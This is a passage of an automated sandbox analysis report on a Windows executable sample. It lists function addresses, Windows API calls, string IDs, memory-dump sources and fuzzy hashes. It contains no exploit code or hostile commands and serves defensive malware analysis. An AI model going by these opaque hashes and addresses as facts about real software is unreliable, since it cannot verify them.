                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                    • Instruction ID: 52e6d937a2ec92b451ae2eba87034e7521c0042fd49777595489bdfc87c72c36
                                                    • Opcode Fuzzy Hash: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                    • Instruction Fuzzy Hash: CF214220F0D66341FA68A322AE5117D61626F457B8F1C473CE83EF7AD6DEACE4458701
                                                    Function 00007FF652EF8D9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                    • Instruction ID: d9e81ef482214c45dd3d2d1f1e49a5b946dda21c3eee495740621b64ee9835fa
                                                    • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                    • Instruction Fuzzy Hash: 1E119322B18A5186E750CB02FC5472A62A0FB98FE8F184338DE1DE7794DFBCD5588744
                                                    Function 00007FF652EEC078 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC087
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0BD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0EA
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0FB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC10C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC127
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                    • Instruction ID: fc2219290458c5ee02c1d6edca9253ee7221305387908f6f0e5540595f15e0e7
                                                    • Opcode Fuzzy Hash: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                    • Instruction Fuzzy Hash: 3A116021B0C67342FA589721AE5117D21629F457B8F2C573CE82EF77D6DEACE8414300
                                                    Function 00007FF652ED25E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    • API String ID: 3081866767-2699770090
                                                    • Opcode ID: 035139a28c932b525dc7cac8fcdac5569ee169202821a797d5d04823a4addf63
                                                    • Instruction ID: 528f908da0aa15a9c5aa4c87bde3cc655f3cd77342b0b240269d7ba121a7e780
                                                    • Opcode Fuzzy Hash: 035139a28c932b525dc7cac8fcdac5569ee169202821a797d5d04823a4addf63
                                                    • Instruction Fuzzy Hash: 5E317036A18A9285EB20DB61FC551FA7360FF88788F480139EA4D9BB95DFBCD105C700
                                                    Function 00007FF652ED29C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED8770: GetLastError.KERNEL32(00000000,00007FF652ED2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8797
                                                      • Part of subcall function 00007FF652ED8770: FormatMessageW.KERNEL32 ref: 00007FF652ED87C6
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • MessageBoxA.USER32 ref: 00007FF652ED2AEC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 2806210788-2410924014
                                                    • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                    • Instruction ID: 77012e0bc45a50f451090e25d66a58c997f3d0b66e34991896ea0aa6732b4c0f
                                                    • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                    • Instruction Fuzzy Hash: A0318372628A9281E730DB10F8516EA6364FFC47C8F84513EE68DA7A99DF7CD605CB40
                                                    Function 00007FF652EEA83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                    • Instruction ID: 453b6af5bd3276c8744376e144b0f12a859824e0d3f1b5ad21747277901d0f88
                                                    • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                    • Instruction Fuzzy Hash: 60F0C822B1961281FB14CB14FC493762320AF48758F58163DD96EA52E0CF7CD049C300
                                                    Function 00007FF652EFA420 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                    • Instruction ID: 76320df5d3a2aa323283a08d25acff88b321842b32ddd231b2ef57166c6b0391
                                                    • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                    • Instruction Fuzzy Hash: 77114C26E18A3301FA541968FC5F37B31416F59378F1C0A3DED6EEE7D68EACA9404204
                                                    Function 00007FF652EEC140 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC15F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC17E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1A6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1B7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                    • Instruction ID: bde152fcb718939de24e0540c0387afc69ff811c53b911d04445167de5cb40e3
                                                    • Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                    • Instruction Fuzzy Hash: 72115B21F0C66341FA58A325AD4127921625F953B8F1C533DE83EF77DADEACE9418710
                                                    Function 00007FF652EEBFD4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                    • Instruction ID: cdc2394aa1b6935f94130d2580c91e3976bd9e4f6a439d7310929094302b390b
                                                    • Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                    • Instruction Fuzzy Hash: 7F111711E0C22741FA69A335AC522BD12A25F4677CF2C173CD83EFA2D6DDBCB9428200
                                                    Function 00007FF652EE69F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: verbose
                                                    • API String ID: 3215553584-579935070
                                                    • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                    • Instruction ID: e9401b1721d9d30f3831e2d12b45ef387a662f88f01b6bf8490cac09e98619b9
                                                    • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                    • Instruction Fuzzy Hash: EE91C022A08A6741FB619E25D8603BD37A1EB42B9CF4C413ADA5DA73D5DFBCE4458340
                                                    Function 00007FF652EF0AA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                    • Instruction ID: 3bf0a956d6e36c34e37c1a363e213d2fd593eae589b754b957d2542478f37f57
                                                    • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                    • Instruction Fuzzy Hash: 4F818632E0862285FA774F29E9502BA36A0AB11B4CF5D8039CA0DF729DDFBDF5059701
                                                    Function 00007FF652EDCF80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2395640692-1018135373
                                                    • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                    • Instruction ID: 942f6b07ac4a1daa3224efcf2cd10f6b3d47a6dee52df6b7e60e408bcc17dfb8
                                                    • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                    • Instruction Fuzzy Hash: DD51B063B196228ADB14CB15E84467D37A6EBC4B9CF58813CDA4A93788DFBDE841C700
                                                    Function 00007FF652EDF800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                    • Instruction ID: 3c14d8127056432f41124ee53c90e737feeae5ad7fad9d369909fc37c72f13f7
                                                    • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                    • Instruction Fuzzy Hash: C0619432908BC585EB20DB15E8403AAB7A0FBC4798F08422DEB9D57B55DFBCE194CB00
                                                    Function 00007FF652EDFBB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                    • Instruction ID: fc25f36874ac82e5dd5ab85346afc6a64d1a883e0031156948d02aaf10905d5b
                                                    • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                    • Instruction Fuzzy Hash: 8F518F3290866286EB64CB1198443A97790FB95B8CF1C413EDE8DA7BC5CFBCE461C705
                                                    Function 00007FF652ED2870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                    • Instruction ID: fd621e8eea7fff6d0b95926d565b9a533eeb75abb55fa07af4f7e9ca9e979523
                                                    • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                    • Instruction Fuzzy Hash: CD31767262869281E720DB10F8516DA6364FFC47C8F84513EE78DA7A99DF7CD605CB40
                                                    Function 00007FF652ED4340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • CreateFileW.KERNEL32(00000000,?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43A8
                                                    • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43C8
                                                    • CloseHandle.KERNEL32(?,?,00007FF652ED3FB9,?,00007FF652ED39CA), ref: 00007FF652ED43D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                    • String ID: \\?\
                                                    • API String ID: 2226452419-4282027825
                                                    • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                    • Instruction ID: 5c60f338cc06f4c95d085e19e78e5ae37600b3bb0d81218b81875bf9327b330d
                                                    • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                    • Instruction Fuzzy Hash: 0E21E172B1866145E720DB21FC407AA6251EBC87D8F480239DF4DA3A94DFBCE549CB00
                                                    Function 00007FF652EED350 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
